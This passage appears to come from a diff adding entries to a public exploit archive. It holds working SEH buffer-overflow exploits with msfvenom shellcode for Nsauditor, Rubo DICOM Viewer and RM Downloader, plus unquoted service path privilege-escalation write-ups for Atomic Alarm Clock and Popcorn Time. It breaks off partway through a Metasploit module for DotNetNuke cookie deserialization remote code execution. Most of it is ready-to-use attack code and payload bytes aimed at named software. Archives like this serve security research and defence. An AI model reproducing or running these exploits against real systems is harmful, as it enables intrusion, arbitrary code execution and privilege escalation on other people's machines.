fWinExec = '\x68\x57\x69\x6E\x45\x33\xC0\x33\xF6\x03\xF4\xFC\x50\x33\xC9\x41\x41\x41\x41\xF7\xE1\x33\xFF\x03\x3C\x18\x58\x03\x7C\x24\x0C\xF3\xA6\x74\x03\x40\xEB\xE1\x33\xC9\x41\x41\xF7\xE1\x33\xC9\x03\x4C\x24\x08\x03\xC8\x33\xC0\x66\x03\x01\x33\xC9\x41\x41\x41\x41\xF7\xE1\xFF\x74\x24\x04\x01\x04\x24\x5A\x33\xDB\x03\x1A\x03\x5C\x24\x0C'
# Call WinExec( CmdLine, ShowState );
# CmdLine = "calc.exe"
# ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window
callWinExec = '\x33\xC9\x51\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x33\xC0\x03\xC4\x41\x51\x50\xFF\xD3'
shellcode = fKernel32+gExpotTbl+fWinExec+callWinExec
buffer = os_nSEH+nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds+os_decoder+firstHalf+shellcode
filler = '\x77'*(9000-len(buffer))
buffer = buffer+filler
try:
payload = buffer
f = open(File, 'w')
f.write(payload)
f.close()
print File + " created successfully"
except:
print File + ' failed to create'

108
exploits/windows/local/48350.py Executable file
View file

@ -0,0 +1,108 @@
# Exploit Title: Nsauditor 3.2.1.0 - Buffer Overflow (SEH+ASLR bypass (3 bytes overwrite))
# Date: 2020-04-17
# Exploit Author: Cervoise
# Vendor Homepage: https://www.nsauditor.com/
# Software Link: https://www.nsauditor.com/downloads/nsauditor_setup.exe
# Version: 3.2.1.0 and 3.0.28
# Tested on: Windows 10.0.18363.778 x86 Pro EN
# Exploit originally found on Nsauditor 3.0.28.0 by ACHILLES
(https://www.exploit-db.com/exploits/46005)
# Latest version Nsauditor 3.2.1.0 (4/13/2020 1:51:53) is still
vulnerable
# 1 -> Change the shellcode with the one you want
# 2 -> Open nsauditor-3-2-1-exploit.txt and copy content to clipboard
# 3 -> Open Nsauditor
# 4 -> In the Window select "Tools" -> "Dns Lookup"
# 5 -> Paste the content into the Field: "Dns Query'"
# 6 -> Click "Resolve"
#!/usr/bin/python3
# Badchars ->
\x00\x0a\x0d\x2e\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9f\xf0\xf1\xf2\xf3\xf4\xf5\xf6
# Maybe less badchars between \x80 and \x9f but I was lazy (I just
checked thoose I needed)
# msfvenom -p windows/exec CMD=calc -e x86/alpha_mixed -f python -v
shellcode
shellcode = b""
shellcode += b"\x89\xe7\xd9\xe9\xd9\x77\xf4\x59\x49\x49\x49"
shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43"
shellcode += b"\x43\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30"
shellcode += b"\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
shellcode += b"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
shellcode += b"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x6e\x62\x73"
shellcode += b"\x30\x37\x70\x75\x50\x35\x30\x6f\x79\x68\x65"
shellcode += b"\x36\x51\x6f\x30\x43\x54\x4e\x6b\x70\x50\x30"
shellcode += b"\x30\x4e\x6b\x43\x62\x56\x6c\x4c\x4b\x73\x62"
shellcode += b"\x54\x54\x6c\x4b\x61\x62\x65\x78\x36\x6f\x58"
shellcode += b"\x37\x71\x5a\x56\x46\x66\x51\x49\x6f\x6e\x4c"
shellcode += b"\x65\x6c\x51\x71\x53\x4c\x43\x32\x46\x4c\x47"
shellcode += b"\x50\x6f\x31\x4a\x6f\x66\x6d\x46\x61\x79\x57"
shellcode += b"\x69\x72\x69\x62\x46\x32\x36\x37\x4c\x4b\x63"
shellcode += b"\x62\x76\x70\x4c\x4b\x63\x7a\x45\x6c\x6e\x6b"
shellcode += b"\x72\x6c\x47\x61\x62\x58\x79\x73\x77\x38\x55"
shellcode += b"\x51\x7a\x71\x72\x71\x6e\x6b\x62\x79\x57\x50"
shellcode += b"\x37\x71\x78\x53\x4e\x6b\x57\x39\x72\x38\x5a"
shellcode += b"\x43\x54\x7a\x61\x59\x4e\x6b\x57\x44\x4c\x4b"
shellcode += b"\x45\x51\x39\x46\x30\x31\x79\x6f\x6e\x4c\x5a"
shellcode += b"\x61\x4a\x6f\x44\x4d\x63\x31\x79\x57\x76\x58"
shellcode += b"\x49\x70\x51\x65\x69\x66\x76\x63\x43\x4d\x58"
shellcode += b"\x78\x45\x6b\x51\x6d\x57\x54\x64\x35\x48\x64"
shellcode += b"\x46\x38\x6c\x4b\x42\x78\x67\x54\x36\x61\x6a"
shellcode += b"\x73\x31\x76\x6c\x4b\x44\x4c\x52\x6b\x6c\x4b"
shellcode += b"\x66\x38\x65\x4c\x57\x71\x4a\x73\x6e\x6b\x36"
shellcode += b"\x64\x4e\x6b\x47\x71\x38\x50\x6d\x59\x42\x64"
shellcode += b"\x35\x74\x51\x34\x31\x4b\x33\x6b\x70\x61\x42"
shellcode += b"\x79\x43\x6a\x50\x51\x6b\x4f\x4d\x30\x33\x6f"
shellcode += b"\x63\x6f\x43\x6a\x4e\x6b\x77\x62\x7a\x4b\x6e"
shellcode += b"\x6d\x53\x6d\x50\x6a\x67\x71\x4e\x6d\x6c\x45"
shellcode += b"\x4e\x52\x73\x30\x37\x70\x75\x50\x72\x70\x35"
shellcode += b"\x38\x46\x51\x4e\x6b\x52\x4f\x4f\x77\x4b\x4f"
shellcode += b"\x38\x55\x6f\x4b\x4c\x30\x6e\x55\x6c\x62\x71"
shellcode += b"\x46\x53\x58\x4f\x56\x6d\x45\x6d\x6d\x6d\x4d"
shellcode += b"\x39\x6f\x58\x55\x47\x4c\x44\x46\x43\x4c\x74"
shellcode += b"\x4a\x6b\x30\x49\x6b\x59\x70\x34\x35\x47\x75"
shellcode += b"\x6f\x4b\x50\x47\x56\x73\x73\x42\x70\x6f\x53"
shellcode += b"\x5a\x67\x70\x51\x43\x4b\x4f\x6b\x65\x31\x73"
shellcode += b"\x70\x61\x52\x4c\x30\x63\x73\x30\x41\x41"
# 0x006ea017 : pop esi # pop ecx # ret | startnull
{PAGE_EXECUTE_WRITECOPY} [Nsauditor.exe] ASLR: False, Rebase: False,
SafeSEH: False, OS: False, v3.0.28.0 (C:\Program
Files\Nsauditor\Nsauditor.exe)
# 0x006ea017 : pop esi # pop ecx # ret | startnull
{PAGE_EXECUTE_WRITECOPY} [Nsauditor.exe] ASLR: False, Rebase: False,
SafeSEH: False, OS: False, v3.2.1.0 (C:\Program
Files\Nsauditor\Nsauditor.exe)
pop_pop_ret = b"\x17\xa0\x6e"
jmp_back = b"\xeb\xc3\x90\x90" #JMP 0xffffffc5
# An address near the end of our buffer is on the stack, only three pop
are needed to get it
# Then we just have to moving at the begging of our buffer
# An egghunter does the job, but will not be compatible with all Windows
versions
going_back = b"\x58" #POP EAX
going_back += b"\x58" #POP EAX
going_back += b"\x58" #POP EAX
going_back += b"\x83\xE8\x79" #SUB EAX,0x79
going_back += b"\x83\xE8\x79" #SUB EAX,0x79
going_back += b"\x83\xE8\x79" #SUB EAX,0x79
going_back += b"\x83\xE8\x79" #SUB EAX,0x79
going_back += b"\x83\xE8\x79" #SUB EAX,0x79
going_back += b"\xFF\xE0" #JMP EAX
buffer = b"\x90"*(5235-len(shellcode)-len(going_back)-100)
buffer += shellcode + b"\x90"*100
buffer += going_back
buffer += jmp_back + pop_pop_ret #nSEH / SEH
# Write the exploit
file = open("nsauditor-3-2-1-exploit.txt", "wb")
file.write(buffer)
file.close()

54
exploits/windows/local/48351.py Executable file
View file

@ -0,0 +1,54 @@
# Exploit Title: Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)
# Exploit Author: bzyo
# Date: 2020-04-17
# Vulnerable Software: Rubo Medical Imaging - DICOM Viewer 2.0
# Vendor Homepage: http://www.rubomedical.com/
# Version: 2.0
# Software Link : http://www.rubomedical.com/download/index.php
# Tested Windows 7 SP1 x86
#
#
# PoC
# 1. generate overview.txt, copy contents to clipboard
# 2. open application
# 3. select send dicom files, edit
# 4. paste contents from clipBoard to "DICOM server name" field
# 6. pop calc
#!/usr/bin/python
import struct
junk1 = "A"*1868
#0x00402f0e : pop ecx # pop ebp # ret 0x04[Overview.exe]
seh = struct.pack('<L',0x00402f0e)
jmp1 = "\xeb\xf8\xcc\xcc"
jmp2 = "\xe9\x11\xFF\xFF\xFF\x90"
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b "\x00\x0d" -f c
#Payload size: 220 bytes
calc = ("\xd9\xc3\xba\x3a\xf3\xa8\x97\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
"\x31\x31\x53\x18\x03\x53\x18\x83\xc3\x3e\x11\x5d\x6b\xd6\x57"
"\x9e\x94\x26\x38\x16\x71\x17\x78\x4c\xf1\x07\x48\x06\x57\xab"
"\x23\x4a\x4c\x38\x41\x43\x63\x89\xec\xb5\x4a\x0a\x5c\x85\xcd"
"\x88\x9f\xda\x2d\xb1\x6f\x2f\x2f\xf6\x92\xc2\x7d\xaf\xd9\x71"
"\x92\xc4\x94\x49\x19\x96\x39\xca\xfe\x6e\x3b\xfb\x50\xe5\x62"
"\xdb\x53\x2a\x1f\x52\x4c\x2f\x1a\x2c\xe7\x9b\xd0\xaf\x21\xd2"
"\x19\x03\x0c\xdb\xeb\x5d\x48\xdb\x13\x28\xa0\x18\xa9\x2b\x77"
"\x63\x75\xb9\x6c\xc3\xfe\x19\x49\xf2\xd3\xfc\x1a\xf8\x98\x8b"
"\x45\x1c\x1e\x5f\xfe\x18\xab\x5e\xd1\xa9\xef\x44\xf5\xf2\xb4"
"\xe5\xac\x5e\x1a\x19\xae\x01\xc3\xbf\xa4\xaf\x10\xb2\xe6\xa5"
"\xe7\x40\x9d\x8b\xe8\x5a\x9e\xbb\x80\x6b\x15\x54\xd6\x73\xfc"
"\x11\x28\x3e\x5d\x33\xa1\xe7\x37\x06\xac\x17\xe2\x44\xc9\x9b"
"\x07\x34\x2e\x83\x6d\x31\x6a\x03\x9d\x4b\xe3\xe6\xa1\xf8\x04"
"\x23\xc2\x9f\x96\xaf\x2b\x3a\x1f\x55\x34")
junk2 = "\x90"*14
buffer = junk1 + calc + junk2 + jmp2 + jmp1 + seh
with open("overview.txt","wb") as f:
f.write(buffer[:-1])

28
exploits/windows/local/48352.txt Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path
# Exploit Author: boku
# Date: 2020-04-17
# Vendor Homepage: http://www.drive-software.com
# Software Link: http://www.drive-software.com/download/ataclock.exe
# Version: 6.3
# Tested On: Windows 10 Pro 1909 (32-bit)
# Vulnerability Type: Local Privilege Escalation by unquoted service path owned by 'LocalSystem'.
# Vulnerability Description:
# The Atomic Alarm Clock service "timeserv.exe" will load an arbitrary EXE and execute it with SYSTEM integrity.
# This security misconfiguration by the vendor can be exploited locally or as part of an attack chain.
# By placing a file named "Program.exe" on the root drive, an attacker can obtain persistent arbitrary code execution.
# Under normal environmental conditions, this exploit ensures escalation of privileges from Admin to SYSTEM.
C:\Users\boku>sc qc AtomicAlarmClock
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: AtomicAlarmClock
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Atomic Alarm Clock\timeserv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Atomic Alarm Clock Time
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

69
exploits/windows/local/48364.py Executable file
View file

@ -0,0 +1,69 @@
# Exploit Title: RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH)
# Date: 2020-04-20
# Author: Felipe Winsnes
# Software Link: https://www.exploit-db.com/apps/9af366e59468eac0b92212912b5c3bcb-RMDownloader.exe
# Version: 3.1.3.2.2010.06.13
# Tested on: Windows 7 (x86)
# Proof of Concept:
# 1.- Run the python script, it will create a new file "poc.txt"
# 2.- Copy the content of the new file 'poc.txt' to clipboard
# 3.- Open 'RmDownloader.exe'
# 4.- Go to 'Load' tab
# 5.- Paste clipboard in 'Load' parameter
# 6.- Click on button 'OK'
# 7.- Two messageboxes regarding the length of the payload will pop up, click OK
# 8.- Profit
# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/RM-Downloader-SEH/
import struct
# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread
# Payload size: 448 bytes
buf = b""
buf += b"\x89\xe3\xda\xd0\xd9\x73\xf4\x5f\x57\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x39\x78\x6b"
buf += b"\x32\x53\x30\x57\x70\x57\x70\x35\x30\x4d\x59\x4d\x35"
buf += b"\x46\x51\x79\x50\x72\x44\x4e\x6b\x56\x30\x76\x50\x4c"
buf += b"\x4b\x50\x52\x66\x6c\x4c\x4b\x66\x32\x72\x34\x4e\x6b"
buf += b"\x63\x42\x67\x58\x46\x6f\x4e\x57\x71\x5a\x47\x56\x35"
buf += b"\x61\x4b\x4f\x6c\x6c\x65\x6c\x51\x71\x61\x6c\x73\x32"
buf += b"\x66\x4c\x31\x30\x7a\x61\x6a\x6f\x54\x4d\x37\x71\x79"
buf += b"\x57\x4d\x32\x4c\x32\x36\x32\x62\x77\x6c\x4b\x76\x32"
buf += b"\x42\x30\x4e\x6b\x61\x5a\x45\x6c\x4c\x4b\x42\x6c\x32"
buf += b"\x31\x42\x58\x4d\x33\x32\x68\x47\x71\x6b\x61\x70\x51"
buf += b"\x6c\x4b\x61\x49\x47\x50\x33\x31\x4b\x63\x4e\x6b\x30"
buf += b"\x49\x67\x68\x49\x73\x35\x6a\x30\x49\x6c\x4b\x45\x64"
buf += b"\x4c\x4b\x35\x51\x69\x46\x45\x61\x4b\x4f\x4c\x6c\x4b"
buf += b"\x71\x68\x4f\x34\x4d\x66\x61\x69\x57\x34\x78\x59\x70"
buf += b"\x54\x35\x38\x76\x73\x33\x51\x6d\x39\x68\x35\x6b\x71"
buf += b"\x6d\x56\x44\x30\x75\x5a\x44\x76\x38\x4c\x4b\x72\x78"
buf += b"\x54\x64\x33\x31\x38\x53\x70\x66\x6e\x6b\x56\x6c\x70"
buf += b"\x4b\x4e\x6b\x50\x58\x75\x4c\x55\x51\x78\x53\x4e\x6b"
buf += b"\x56\x64\x6e\x6b\x73\x31\x6e\x30\x6e\x69\x37\x34\x56"
buf += b"\x44\x71\x34\x53\x6b\x33\x6b\x63\x51\x61\x49\x73\x6a"
buf += b"\x56\x31\x6b\x4f\x49\x70\x73\x6f\x31\x4f\x43\x6a\x4e"
buf += b"\x6b\x67\x62\x6a\x4b\x6e\x6d\x73\x6d\x32\x4a\x46\x61"
buf += b"\x6c\x4d\x4c\x45\x38\x32\x47\x70\x35\x50\x67\x70\x62"
buf += b"\x70\x53\x58\x54\x71\x4c\x4b\x52\x4f\x4b\x37\x49\x6f"
buf += b"\x38\x55\x6d\x6b\x49\x70\x65\x4d\x46\x4a\x75\x5a\x31"
buf += b"\x78\x79\x36\x7a\x35\x6f\x4d\x6d\x4d\x4b\x4f\x68\x55"
buf += b"\x65\x6c\x57\x76\x71\x6c\x47\x7a\x4f\x70\x49\x6b\x6b"
buf += b"\x50\x74\x35\x37\x75\x6d\x6b\x61\x57\x75\x43\x71\x62"
buf += b"\x72\x4f\x43\x5a\x65\x50\x66\x33\x6b\x4f\x6a\x75\x70"
buf += b"\x63\x55\x31\x72\x4c\x31\x73\x76\x4e\x72\x45\x43\x48"
buf += b"\x50\x65\x67\x70\x41\x41"
nseh = struct.pack("<I", 0x06710870)
seh = struct.pack("<I", 0x10031779) # 0x10031779 : pop ebx # pop eax # ret | ascii {PAGE_EXECUTE_READ} [RDfilter03.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Mini-stream\RM Downloader\RDfilter03.dll)
buffer = "A" * 9008 + nseh + seh + "\x41\x49" * 10 + buf + "\xff" * 200
f = open ("poc.txt", "w")
f.write(buffer)
f.close()

37
exploits/windows/local/48378.txt Normal file
View file

@ -0,0 +1,37 @@
# Exploit Title: Popcorn Time 6.2 - 'Update service' Unquoted Service Path
# Date: 2020-04-24
# Vendor Homepage: https://getpopcorntime.is
# Exploit Authors: Uriel Yochpaz & Jonatan Schor
# Software Link: https://dl.getpopcorntime.is/PopcornTime-latest.exe
# Version: 6.2.1.14 and probably prior versions
# Tested on: Windows 10, 7
# CVE : N/A
[+] Description:
Popcorn Time For Windows installs as a service with an unquoted
service path running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system.
[+] POC:
C:\Users\User>sc qc "Update service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Update service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Popcorn Time\Updater.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Update service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
[+] Exploit:
A successful attempt would require the local user to be able to insert their
code in "Program files (x86)" (popcorn.exe) or "C:\" (program.exe)
folders undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot.
If successful, the local user's code would execute with the elevated privileges
of the application.

970
exploits/windows/remote/48336.rb Executable file
View file

@ -0,0 +1,970 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/powershell'
require 'openssl'
require 'set'
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::HttpServer
Rank = ExcellentRanking
# =================================
# Overidden setup method to allow
# for delayed handler start
# =================================
def setup
# Reset the session counts to zero.
reset_session_counts
return if !payload_instance
return if !handler_enabled?
# Configure the payload handler
payload_instance.exploit_config = {
'active_timeout' => active_timeout
}
# payload handler is normally set up and started here
# but has been removed so we can start the handler when needed.
end
def initialize(info = {})
super(update_info(
info,
'Name' => "DotNetNuke Cookie Deserialization Remote Code Execution",
'Description' => %q(
This module exploits a deserialization vulnerability in DotNetNuke (DNN) versions 5.0.0 to 9.3.0-RC.
Vulnerable versions store profile information for users in the DNNPersonalization cookie as XML.
The expected structure includes a "type" attribute to instruct the server which type of object to create on deserialization.
The cookie is processed by the application whenever it attempts to load the current user's profile data.
This occurs when DNN is configured to handle 404 errors with its built-in error page (default configuration).
An attacker can leverage this vulnerability to execute arbitrary code on the system.
),
'License' => MSF_LICENSE,
'Author' => [ 'Jon Park', 'Jon Seigel' ],
'References' =>
[
[ 'CVE', '2017-9822' ],
[ 'CVE', '2018-15811'],
[ 'CVE', '2018-15812'],
[ 'CVE', '2018-18325'], # due to failure to patch CVE-2018-15811
[ 'CVE', '2018-18326'], # due to failure to patch CVE-2018-15812
[ 'URL', 'https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf'],
[ 'URL', 'https://googleprojectzero.blogspot.com/2017/04/exploiting-net-managed-dcom.html'],
[ 'URL', 'https://github.com/pwntester/ysoserial.net']
],
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { 'auto' => true } ],
[ 'v5.0 - v9.0.0', { 'ReqEncrypt' => false, 'ReqSession' => false } ],
[ 'v9.0.1 - v9.1.1', { 'ReqEncrypt' => false, 'ReqSession' => false } ],
[ 'v9.2.0 - v9.2.1', { 'ReqEncrypt' => true, 'ReqSession' => true } ],
[ 'v9.2.2 - v9.3.0-RC', { 'ReqEncrypt' => true, 'ReqSession' => true } ]
],
'Stance' => Msf::Exploit::Stance::Aggressive,
'Payload' =>
{
},
'Privileged' => false,
'DisclosureDate' => "Jul 20 2017",
'DefaultOptions' => { 'WfsDelay' => 5 },
'DefaultTarget' => 0
))
deregister_options('SRVHOST')
register_options(
[
OptString.new('TARGETURI', [true, 'The path that will result in the DNN 404 response', '/__']),
OptBool.new('DryRun', [false, 'Performs target version check, finds encryption KEY and IV values if required, and outputs a cookie payload', false]),
OptString.new('VERIFICATION_PLAIN', [false, %q(The known (full or partial) plaintext of the encrypted verification code.
Typically in the format of {portalID}-{userID} where portalID is an integer and userID is either an integer or GUID (v9.2.2+)), '']),
OptBool.new('ENCRYPTED', [true, %q(Whether or not to encrypt the final payload cookie;
(VERIFICATION_CODE and VERIFICATION_PLAIN) or (KEY and IV) are required if set to true.), false]),
OptString.new('KEY', [false, 'The key to use for encryption.', '']),
OptString.new('IV', [false, 'The initialization vector to use for encryption.', '']),
OptString.new('SESSION_TOKEN', [false, %q(The .DOTNETNUKE session cookie to use when submitting the payload to the target server.
DNN versions 9.2.0+ require the attack to be submitted from an authenticated context.), '']),
OptString.new('VERIFICATION_CODE', [false, %q(The encrypted verification code received in a registration email.
Can also be the path to a file containing a list of verification codes.), ''])
]
)
initialize_instance_variables
end
def initialize_instance_variables
# ==================
# COMMON VARIABLES
# ==================
@target_idx = 0
# Flag for whether or not to perform exploitation
@dry_run = false
# Flag for whether or not the target requires encryption
@encrypted = false
# Flag for whether or not to attempt to decrypt the provided verification token(s)
@try_decrypt = false
# ==================
# PAYLOAD VARIABLES
# ==================
# ObjectStateFormatter serialized header
@osf_header = [255, 1, 50]
# ObjectStateFormatter serialized data before the command payload
@osf_wrapper_start = [
0, 1, 0, 0, 0, 255, 255, 255, 255, 1, 0, 0, 0, 0, 0, 0, 0, 12, 2, 0, 0, 0, 73,
83, 121, 115, 116, 101, 109, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52,
46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110, 101,
117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84,
111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101,
48, 56, 57, 5, 1, 0, 0, 0, 132, 1, 83, 121, 115, 116, 101, 109, 46, 67, 111,
108, 108, 101, 99, 116, 105, 111, 110, 115, 46, 71, 101, 110, 101, 114, 105,
99, 46, 83, 111, 114, 116, 101, 100, 83, 101, 116, 96, 49, 91, 91, 83, 121,
115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 109, 115, 99, 111,
114, 108, 105, 98, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48,
46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110, 101, 117,
116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111,
107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56,
57, 93, 93, 4, 0, 0, 0, 5, 67, 111, 117, 110, 116, 8, 67, 111, 109, 112, 97,
114, 101, 114, 7, 86, 101, 114, 115, 105, 111, 110, 5, 73, 116, 101, 109, 115,
0, 3, 0, 6, 8, 141, 1, 83, 121, 115, 116, 101, 109, 46, 67, 111, 108, 108, 101,
99, 116, 105, 111, 110, 115, 46, 71, 101, 110, 101, 114, 105, 99, 46, 67, 111,
109, 112, 97, 114, 105, 115, 111, 110, 67, 111, 109, 112, 97, 114, 101, 114,
96, 49, 91, 91, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103,
44, 32, 109, 115, 99, 111, 114, 108, 105, 98, 44, 32, 86, 101, 114, 115, 105,
111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114,
101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99,
75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49,
57, 51, 52, 101, 48, 56, 57, 93, 93, 8, 2, 0, 0, 0, 2, 0, 0, 0, 9, 3, 0, 0, 0,
2, 0, 0, 0, 9, 4, 0, 0, 0, 4, 3, 0, 0, 0, 141, 1, 83, 121, 115, 116, 101, 109,
46, 67, 111, 108, 108, 101, 99, 116, 105, 111, 110, 115, 46, 71, 101, 110, 101,
114, 105, 99, 46, 67, 111, 109, 112, 97, 114, 105, 115, 111, 110, 67, 111, 109,
112, 97, 114, 101, 114, 96, 49, 91, 91, 83, 121, 115, 116, 101, 109, 46, 83,
116, 114, 105, 110, 103, 44, 32, 109, 115, 99, 111, 114, 108, 105, 98, 44, 32,
86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67,
117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32, 80,
117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55, 55,
97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 93, 93, 1, 0, 0, 0, 11,
95, 99, 111, 109, 112, 97, 114, 105, 115, 111, 110, 3, 34, 83, 121, 115, 116,
101, 109, 46, 68, 101, 108, 101, 103, 97, 116, 101, 83, 101, 114, 105, 97, 108,
105, 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 9, 5, 0, 0, 0,
17, 4, 0, 0, 0, 2, 0, 0, 0, 6, 6, 0, 0, 0
]
# ObjectStateFormatter serialized data to place after the command payload.
@osf_wrapper_end = [
6, 7, 0, 0, 0, 3, 99, 109, 100, 4, 5, 0, 0, 0, 34, 83, 121, 115, 116, 101,
109, 46, 68, 101, 108, 101, 103, 97, 116, 101, 83, 101, 114, 105, 97, 108,
105, 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 3, 0, 0, 0, 8,
68, 101, 108, 101, 103, 97, 116, 101, 7, 109, 101, 116, 104, 111, 100, 48, 7,
109, 101, 116, 104, 111, 100, 49, 3, 3, 3, 48, 83, 121, 115, 116, 101, 109,
46, 68, 101, 108, 101, 103, 97, 116, 101, 83, 101, 114, 105, 97, 108, 105,
122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 43, 68, 101, 108,
101, 103, 97, 116, 101, 69, 110, 116, 114, 121, 47, 83, 121, 115, 116, 101,
109, 46, 82, 101, 102, 108, 101, 99, 116, 105, 111, 110, 46, 77, 101, 109,
98, 101, 114, 73, 110, 102, 111, 83, 101, 114, 105, 97, 108, 105, 122, 97,
116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 47, 83, 121, 115, 116, 101,
109, 46, 82, 101, 102, 108, 101, 99, 116, 105, 111, 110, 46, 77, 101, 109,
98, 101, 114, 73, 110, 102, 111, 83, 101, 114, 105, 97, 108, 105, 122, 97,
116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 9, 8, 0, 0, 0, 9, 9, 0, 0,
0, 9, 10, 0, 0, 0, 4, 8, 0, 0, 0, 48, 83, 121, 115, 116, 101, 109, 46, 68,
101, 108, 101, 103, 97, 116, 101, 83, 101, 114, 105, 97, 108, 105, 122, 97,
116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 43, 68, 101, 108, 101, 103,
97, 116, 101, 69, 110, 116, 114, 121, 7, 0, 0, 0, 4, 116, 121, 112, 101, 8,
97, 115, 115, 101, 109, 98, 108, 121, 6, 116, 97, 114, 103, 101, 116, 18,
116, 97, 114, 103, 101, 116, 84, 121, 112, 101, 65, 115, 115, 101, 109, 98,
108, 121, 14, 116, 97, 114, 103, 101, 116, 84, 121, 112, 101, 78, 97, 109,
101, 10, 109, 101, 116, 104, 111, 100, 78, 97, 109, 101, 13, 100, 101, 108,
101, 103, 97, 116, 101, 69, 110, 116, 114, 121, 1, 1, 2, 1, 1, 1, 3, 48, 83,
121, 115, 116, 101, 109, 46, 68, 101, 108, 101, 103, 97, 116, 101, 83, 101,
114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101,
114, 43, 68, 101, 108, 101, 103, 97, 116, 101, 69, 110, 116, 114, 121, 6, 11,
0, 0, 0, 176, 2, 83, 121, 115, 116, 101, 109, 46, 70, 117, 110, 99, 96, 51,
91, 91, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32,
109, 115, 99, 111, 114, 108, 105, 98, 44, 32, 86, 101, 114, 115, 105, 111,
110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114,
101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99,
75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49,
57, 51, 52, 101, 48, 56, 57, 93, 44, 91, 83, 121, 115, 116, 101, 109, 46, 83,
116, 114, 105, 110, 103, 44, 32, 109, 115, 99, 111, 114, 108, 105, 98, 44,
32, 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32,
67, 117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114, 97, 108, 44,
32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 98,
